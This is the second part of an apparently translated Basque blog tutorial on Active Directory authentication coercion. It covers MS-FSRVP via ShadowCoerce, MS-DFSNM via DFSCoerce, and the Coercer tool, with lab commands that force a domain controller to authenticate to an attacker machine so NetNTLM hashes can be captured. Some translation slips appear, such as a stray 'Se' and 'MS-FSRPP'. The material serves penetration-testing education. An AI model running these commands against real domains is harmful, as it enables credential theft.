Bortxaketa | II. zatia
Celia Catalán
Kaixo berriro guztioi! Agindu bezala, Coerce sagarekin jarraitzen dugu eta bigarren zati honetan beste RPC zaurgarri batzuk komentatzen jarraitzen dugu:
MS-FSRPP
MS-FSRVP Urruneko Prozedura Deia da VSS urruneko fitxategi-zerbitzariaren protokoloarekin lotutakoa. Urrutiko ordenagailu batean fitxategi-partekatzeen kopiak sortzeko eta babeskopia-aplikazioek aplikazioekin bat datozen babeskopiak egiteko eta datuak SMB2-ko partekatzeetan leheneratzeko erabiltzen da.
Kontuan izan behar da ahultasun hori ustiatzeko, zerbitzariak "File Server VSS Agent Service" funtzioa gaituta izan behar duela.
Kontuan izan behar da Microsoft-ek bi segurtasun adabaki kaleratu zituela zuzentzeko 2022ko ekainaren 14an.
Egiaztapena
MS-RPRN-ren kasuan bezala, egiaztatzeko impacket -en rpcdump erabiltzen dugu MS-FSRVP RPC gaituta badago:
python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'
Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.
Explotazioa
Biktimarengan "MS-FSRPP" izeneko RPC gaituta dagoela egiaztatu ondoren, domeinu-erabiltzailea beste bide batzuen bidez arriskuan jartzeaz gain, -2022-30154 CVE identifikatzailea esleituta duen ShadowCoerce izeneko PoC baten bidez ustiatuko da.
Era berean, autentifikazioa behar bezala behartuta dagoela egiaztatzeko, “dc.corp.lab” domeinuan pribilegio mugatuak dituen “bob” erabiltzailea erabiliko dugu.
python shadowcoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
NetNTLM hash-aren harrapaketa Erantzun tresnan ikus dezakezu.
MS-DFSNM
MS-DFSNM Distributed File System (DFS): Namespace Management Protocol-arekin erlazionatutako Urruneko Prozedura Deia da. RPC interfaze bat eskaintzen du DFS konfigurazioak kudeatzeko.
Egiaztapena
MS-EFSR-ren kasuan bezala, crackmapexec tresna erabiliko dugu, "dfscoerce" moduluaren exekuzioaren bidez eta "dc.corp.lab" domeinuan pribilegio mugatuak dituen "bob" erabiltzailea erabiliz, ala ez egiaztatzeko. zerbitzaria zaurgarria da edo ez, baina oraingoan aurrez arriskuan jarritako domeinuko erabiltzaile batekin:
crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce
Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.
Explotazioa
Domeinu-kontrolatzailea zaurgarria dela egiaztatu ondoren, 2022ko ekainean argitaratu zen DFSCoerce izeneko PoC baten bidez ustiatu egingo da.
Era berean, autentifikazioa behar bezala behartuta dagoela egiaztatzeko, “dc.corp.lab” domeinuan pribilegio mugatuak dituen “bob” erabiltzailea erabiliko dugu.
python3 dfscoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab
Se
NetNTLM hash-aren harrapaketa Erantzun tresnan ikus dezakezu.
Guztiak batentzat eta batentzat
Coercer Python-en idatzitako tresna bat da, "Coerce Authentication" bat egiteko hainbat metodo probatzen dituena, goian deskribatutako guztiak barne hartzeaz gain.
Hiru exekuzio modu ditu, eskaneatu, behartu eta fuzz. Eskaneatu moduan exekutatzeko adibide bat honako hau izango litzateke:
coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Koertza moduan exekutatzeko adibide bat honako hau izango litzateke:
coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"
Cheat Orria
